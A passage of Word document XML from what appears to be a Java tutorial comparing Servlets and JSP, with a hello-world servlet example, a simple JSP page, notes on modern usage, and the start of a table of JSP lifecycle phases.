        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46F3E23F"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Less readable for front-end</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="153B62A1"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More readable for designers (looks like HTML)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="688D7BD1" w14:textId="77777777" w:rsidTr="00176D44">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13E65FFA"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Modification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07FCBD8F"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Requires recompilation after changes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0600D239"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Can just modify the JSP file without recompiling servlet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="2D609630" w14:textId="77777777" w:rsidTr="00176D44">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16D3FA16"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Lifecycle Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D2DECD1"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Full lifecycle management with init, service, destroy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45E2EB10"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Follows servlet lifecycle indirectly</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6D6E6CF4" w14:textId="77777777" w:rsidR="00176D44"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1FBCB95">
          <v:rect id="_x0000_i1930" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4056AB5A" w14:textId="77777777" w:rsidR="00176D44" w:rsidRPr="001B573F" w:rsidRDefault="00176D44"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Simple Analogy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F865F3"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Servlet</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is like the </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>brain</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🧠</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (logic + data),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6BF557"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JSP</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is like the </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>face</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>😃</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (UI + presentation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAFF12F" w14:textId="77777777" w:rsidR="00176D44"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3BDE626">
          <v:rect id="_x0000_i1931" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C4652D" w14:textId="77777777" w:rsidR="00176D44" w:rsidRPr="001B573F" w:rsidRDefault="00176D44"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546A45AA" w14:textId="77777777" w:rsidR="00176D44" w:rsidRPr="001B573F" w:rsidRDefault="00176D44"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Servlet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFF6E31"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public class HelloServlet extends HttpServlet {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613302B3"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protected void doGet(HttpServletRequest req, HttpServletResponse res) throws IOException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFB7001"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res.getWriter().println("Hello from Servlet!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5504D48B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355AADD7"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CBE6AC" w14:textId="77777777" w:rsidR="00176D44" w:rsidRPr="001B573F" w:rsidRDefault="00176D44"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JSP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135D3EF6"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lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B451B2F"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lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2530E6A4"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h1&gt;Hello from JSP!&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600CF220"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lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB19994" w14:textId="77777777" w:rsidR="00176D44" w:rsidRPr="001B573F" w:rsidRDefault="00176D44"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lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175DA872" w14:textId="77777777" w:rsidR="00176D44"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7332388">
          <v:rect id="_x0000_i1932" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F13E39E" w14:textId="77777777" w:rsidR="00176D44" w:rsidRPr="001B573F" w:rsidRDefault="00176D44"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Modern Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39102C2B" w14:textId="77777777" w:rsidR="00176D44" w:rsidRPr="001B573F" w:rsidRDefault="00176D44" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1763"/>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Servlets</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are often used </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>under the hood</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in frameworks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7B4C8E" w14:textId="77777777" w:rsidR="00176D44" w:rsidRPr="001B573F" w:rsidRDefault="00176D44" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1763"/>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JSP</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is now less commonly used, replaced by </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Thymeleaf</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>React</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6134C2BE" w14:textId="77777777" w:rsidR="00176D44" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00176D4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FE70F8B">
          <v:rect id="_x0000_i1933" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D81D34" w14:textId="47ACE69A" w:rsidR="00502122" w:rsidRPr="00CE4B95" w:rsidRDefault="009E74CB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="392" w:name="_Toc196307872"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the JSP lifecycle</w:t>
      </w:r>
      <w:r w:rsidR="00502122" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="392"/>
    </w:p>
    <w:p w14:paraId="79372CCD" w14:textId="0D65F950" w:rsidR="000631FC" w:rsidRPr="001B573F" w:rsidRDefault="000631FC" w:rsidP="001B573F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>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JSP Lifecycle Explained</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BEBBCB"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JSP</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> page is actually </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>converted into a Servlet</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by the container (like Tomcat), and it follows a lifecycle similar to servlets — but with a few unique phases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34373662" w14:textId="77777777" w:rsidR="000631FC"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D132A7C">
          <v:rect id="_x0000_i1934" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="452E2D0F" w14:textId="77777777" w:rsidR="000631FC" w:rsidRPr="001B573F" w:rsidRDefault="000631FC"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JSP Lifecycle Pha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95"/>
        <w:gridCol w:w="5234"/>
      </w:tblGrid>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="0462C805" w14:textId="77777777" w:rsidTr="000631FC">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17838207" w14:textId="77777777" w:rsidR="000631FC" w:rsidRPr="001B573F" w:rsidRDefault="000631FC" w:rsidP="001B573F">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001B573F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B1FF766" w14:textId="77777777" w:rsidR="000631FC" w:rsidRPr="001B573F" w:rsidRDefault="000631FC" w:rsidP="001B573F">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001B573F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="0629FDDE" w14:textId="77777777" w:rsidTr="000631FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CA011A0"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1️</w:t>
            </w:r>
            <w:r w:rsidRPr="001B573F">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>⃣</w:t>
            </w:r>
            <w:r w:rsidRPr="001B573F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001B573F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Translation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03D10E9B"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JSP is translated into a Java servlet (.java file)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="4E129682" w14:textId="77777777" w:rsidTr="000631FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13FCF1E9"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2️</w:t>
            </w:r>
            <w:r w:rsidRPr="001B573F">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>⃣</w:t>
            </w:r>
            <w:r w:rsidRPr="001B573F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001B573F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Compilation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69D93D53"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The .java servlet file is compiled into a .class</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="11066AAD" w14:textId="77777777" w:rsidTr="000631FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A24CEA5"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3️</w:t>
            </w:r>
            <w:r w:rsidRPr="001B573F">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>⃣</w:t>
            </w:r>
            <w:r w:rsidRPr="001B573F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001B573F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Loading</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31186C7B"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The compiled servlet class is loaded into memory</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="53706C43" w14:textId="77777777" w:rsidTr="000631FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E3726F8"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4️</w:t>
            </w:r>
            <w:r w:rsidRPr="001B573F">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>⃣</w:t>
            </w:r>
            <w:r w:rsidRPr="001B573F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001B573F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Instantiation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64DED3CE"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The servlet object (from JSP) is created</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="63C9E40B" w14:textId="77777777" w:rsidTr="000631FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AF62BCC"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5️</w:t>
            </w:r>
            <w:r w:rsidRPr="001B573F">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>⃣</w:t>
            </w:r>
            <w:r w:rsidRPr="001B573F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001B573F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Initialization (jspInit())</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70FAE256"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Called once after instantiation (like init() in servlets)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="76080A16" w14:textId="77777777" w:rsidTr="000631FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
